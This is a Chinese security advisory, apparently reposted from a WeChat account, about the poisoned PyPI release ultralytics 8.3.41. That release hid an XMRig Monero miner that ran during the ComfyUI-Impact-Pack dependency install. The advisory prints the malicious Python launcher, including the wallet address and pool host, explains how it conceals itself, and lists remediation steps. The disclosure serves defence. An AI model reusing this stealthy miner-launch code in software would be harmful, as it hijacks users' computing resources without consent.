【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

admin 2024年12月6日15:33:31评论50 views字数 1303阅读4分20秒阅读模式

声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

      现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!

【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

概要

在使用ComfyUI和ComfyUI-Impact-Pack扩展时,ultralytics 8.3.41版本官方pypi包被投毒,该恶意程序是门罗币xmrig的官方程序,经base64编码后存在于包代码中,并在执行ComfyUI-Impact-Pack install.py中包含的安装依赖项的脚本期间,链接矿池,触发挖矿程序,影响范围覆盖全球。

【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

影响版本

Python 组件 ultralytics==8.3.41
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

恶意代码

def safe_run(path):    os.chmod(path, 0o770)    command = [        path,        '-u',        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',        '-o',        'connect.consrensys.com:8080',        '-k'    ]    process = subprocess.Popen(        command,        stdin=subprocess.DEVNULL,        stdout=subprocess.DEVNULL,        stderr=subprocess.DEVNULL,        preexec_fn=os.setsid,        close_fds=True    )    os.remove(path)

恶意代码行为

权限更改:脚本用于os.chmod使文件可执行。恶意命令执行:代码执行命令连接到connect.consrensys.com:8080一个潜在的恶意挖矿池。隐藏进程:脚本抑制标准输入、输出和错误流以避免被发现。文件删除:删除已执行的文件以消除恶意活动的证据。

【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

目前相关恶意代码已从8.3.41版本中删除。

原文链接 https://github.com/ltdrdata/ComfyUI-Impact-Pack/issues/843
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

修复建议: 

 1.卸载相关依赖包   pip uninstall ultralytics ultralytics-thop 2.禁用与connect.consrensys.com相关网络链接 3.排查进程,是否存在xmrig门罗币挖矿程序 4.安装ultralytics其他版本的包  pip3 install ultralytics==8.3.40
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门
【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

漏洞收录

漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞

现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。

【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

点击下方名片进入公众号,欢迎关注!

【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

点个小赞你最好看

原文始发于微信公众号(猫蛋儿安全):【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月6日15:33:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【供应链投毒预警】ComfyUI热门插件Ultralytics依赖官方Pypi包被植入挖矿后门https://cn-sec.com/archives/3474844.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息